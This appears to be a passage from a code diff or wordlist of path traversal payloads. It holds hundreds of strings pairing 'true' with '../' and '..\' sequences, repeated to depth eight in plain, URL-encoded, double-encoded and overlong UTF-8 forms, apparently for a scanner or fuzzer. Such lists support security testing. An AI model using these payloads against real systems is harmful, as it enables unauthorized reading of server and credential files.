"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + 